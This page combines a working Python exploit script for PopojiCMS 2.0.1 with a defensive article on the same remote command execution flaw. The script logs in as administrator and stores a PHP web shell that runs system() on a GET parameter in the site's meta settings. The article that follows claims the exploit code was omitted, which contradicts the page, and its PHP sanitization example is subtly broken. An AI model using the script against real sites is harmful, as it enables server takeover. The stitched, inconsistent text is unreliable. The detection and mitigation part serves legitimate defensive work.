PopojiCMS 2.0.1 - Remote Command Execution (RCE)
# Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution
# Date: 14/04/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.popojicms.org/
# Software Link:
https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip
# Version: Version : 2.0.1
# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS
import requests
import time
import sys
def exploit(url, username, password):
login_url = f"{url}/po-admin/route.php?mod=login&act=proclogin"
login_data = {"username": username, "password": password}
headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": f
"{url}/po-admin/index.php"}
session = requests.Session()
login_response = session.post(login_url, data=login_data, headers=headers)
if "Administrator PopojiCMS" in login_response.text:
print("Login Successful!")
time.sleep(1) # 1 saniye bekle
else:
print("Login Failed!")
return
edit_url = f"{url}/po-admin/route.php?mod=setting&act=metasocial"
edit_data = {"meta_content": """<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>"""}
edit_response = session.post(edit_url, data=edit_data, headers=headers)
if "cmd" in edit_response.text:
print("Your shell is ready:", url)
time.sleep(1)
else:
print("Exploit Failed!")
return
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Kullanım: python exploit.py sitename username password")
sys.exit(1)
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
print("Exploiting...")
time.sleep(1)
print("Logging in...")
time.sleep(1)
exploit(url, username, password)PopojiCMS 2.0.1 Remote Command Execution (RCE) — Analysis, Risk, Detection, and Mitigation
This article examines a Remote Command Execution (RCE) issue reported against PopojiCMS version 2.0.1, explains the root cause at a high level, outlines risk and detection indicators, and provides practical, defensive remediation and hardening guidance for administrators and developers. Examples below are focused on mitigation and secure coding; exploit code is intentionally omitted to avoid enabling misuse.
Summary
- Vulnerability class: Code injection / remote command execution (CWE-94).
- Affected version: PopojiCMS 2.0.1 (reported behavior in admin settings allowing unfiltered PHP/HTML storage).
- Attack vector: An authenticated administrator (or an attacker who gains admin privileges) could inject code into site settings that is later interpreted/executed by the web server, enabling command execution on the host.
- Impact: Full server compromise (depending on web-server privileges), data disclosure, persistence via web shells.
Root cause (high level)
The issue stems from storing user-controllable content (site meta, social, or other settings) that contains PHP code or tags, and later rendering or including that content in a way that causes the PHP interpreter to execute it. The underlying defects generally include:
- Insufficient input validation and sanitization for administrative input.
- Improper use of mechanisms that evaluate or include stored content (e.g., writing raw content to a file and including it with include/require, or echoing content into a context that allows execution).
- Lack of output encoding/escaping for untrusted HTML snippets.
Risk and attack considerations
Although this class of issue often requires administrative access to inject code, the real-world risk is often non-trivial because:
- Many deployments use weak/unchanged admin credentials or have other vulnerabilities (e.g., SQL injection, default accounts) that allow privilege escalation.
- Automated scanners and opportunistic attackers target well-known CMS admin interfaces.
- Once code is injected and executed, an attacker can escalate to persistence and lateral movement.
CWE/CVSS context
| Category | Details |
|---|---|
| CWE | CWE-94: Improper Control of Generation of Code ('Code Injection') |
| Typical CVSS Impact | High — remote code execution can lead to complete host compromise when exploited |
Detection and Indicators of Compromise (IoC)
Detecting exploitation or attempts includes monitoring for anomalous changes to settings, presence of PHP tags in stored content, and unusual web requests or processes.
- Database checks: look for PHP tags or suspicious payloads in settings tables:
SELECT id, meta_name, meta_content FROM po_meta WHERE meta_content LIKE '%<?php%' OR meta_content LIKE '%<?%';Explanation: This query lists meta entries that contain PHP open tags. It is intended for administrators to identify injected code stored in the DB.
- Web logs: look for POST requests to admin routes that update settings (e.g., POSTs to route.php?mod=setting or similar), followed by requests to pages that contain injected content. Correlate IPs and user agents.
- File system artifacts: web shells often create or write files under writable directories. Look for recently modified files or files containing "<?php".
- Process monitoring: unexpected processes spawned by web server (shells connecting to remote IPs) or unusual outgoing connections.
Remediation and mitigations
Fixing this issue should include patching the application and applying defense-in-depth measures. Recommended actions:
- Upgrade: apply the vendor patch or upgrade to a patched version of PopojiCMS if available.
- Sanitize and validate: treat any administrative input as untrusted. Disallow PHP tags inside stored content intended to be displayed, unless a safe, explicit template mechanism is used.
- Output encoding: when rendering content into HTML responses, escape or sanitize to neutralize dangerous constructs.
- Least privilege: run PHP and web server under accounts with minimal rights and avoid writable code directories for web server users.
- Disable dangerous functions: consider disabling exec/system/passthru/shell_exec in php.ini if not required.
- WAF and monitoring: deploy a web application firewall and monitor admin routes and changes to configuration pages.
- Strong authentication: enforce strong admin passwords and multi-factor authentication where possible.
Example: Defensive PHP sanitization strategies
Below are safe, defensive code patterns to prevent stored PHP from being executed. These examples show sanitization and safe storage of admin-provided HTML snippets. They are intended for maintainers to integrate into the settings-save logic.
/* Example: basic sanitization before storing a settings/html field */function sanitize_admin_html($input) {
// Remove PHP open/close tags entirely
$clean = str_ireplace(array('<?php', '<?php', ''), '', $input);
// Use an HTML sanitizer to allow only safe tags/attributes
// Example: use HTMLPurifier (recommended) or a robust allowlist
// $purifier = new HTMLPurifier($config);
// $clean = $purifier->purify($clean);
// As a fallback: escape output on rendering side, not here
return $clean;
}
Explanation: The function strips common PHP open/close tags (case-insensitive) from the input to prevent injected <?php blocks. Ideally, use a library such as HTMLPurifier to enforce a safe HTML allowlist rather than ad hoc removals. Always prefer sanitizing on input and escaping on output.
/* Example: safe save handler using parameterized queries */$stmt = $db->prepare("UPDATE po_meta SET meta_content = ? WHERE meta_name = ?");
$clean_content = sanitize_admin_html($_POST['meta_content']);
$stmt->bind_param('ss', $clean_content, $meta_name);
$stmt->execute();
Explanation: Use parameterized queries to prevent SQL-related injection. The meta content is sanitized first and then stored via a safe query. This example assumes mysqli-style API but applies equally to PDO prepared statements.
Additional secure architecture recommendations
- Do not write user-provided strings to PHP files and then include/require them. If templates are needed, use a templating engine that separates code from data (e.g., Twig) and does not evaluate arbitrary PHP.
- Store HTML snippets as data (in DB) and render them inside secure contexts with proper escaping; if trusted HTML is required, maintain a strict allowlist and auditing workflow for changes.
- Implement CSRF protections for admin actions and log all administrative changes with immutable audit trails.
Detection and response playbook
- Immediate steps on suspected compromise:
- Isolate the host from the network to prevent exfiltration and lateral movement.
- Capture volatile evidence (memory, processes, network connections) before rebooting.
- Inspect database meta tables for PHP tags (use the SELECT query above) and search the filesystem for recently modified files containing '<?php'.
- Revoke and rotate any credentials that may have been exposed (admin accounts, API keys).
- Recovery:
- Restore the application from a known-good backup taken before the compromise.
- Apply patches, configuration hardening, and increased logging/monitoring.
- Perform a post-incident review to identify root cause and close detection gaps.
Safe testing guidance for administrators and pentesters
If you are an authorized site owner or an approved penetration tester, perform testing only on systems you own or have written authorization to test. Prefer non-destructive checks and replicas:
- Test on a staging copy of the site (local VM or isolated environment) rather than production.
- Use safe queries and content searches to discover problematic stored content (the SELECT query above).
- Do not upload or execute any PHP payloads on production systems. Instead, validate that admin input is sanitized and does not allow PHP tags or execution.
Conclusion and takeaways
PopojiCMS installations that permit storage and later execution of administrative content without proper sanitization are at risk of severe compromise. The recommended path is to (1) upgrade or patch the CMS, (2) harden input validation and output encoding, (3) limit privileges and disable unnecessary functions, and (4) monitor and audit admin actions. Applying these layered defenses reduces the likelihood and impact of code-injection and RCE threats.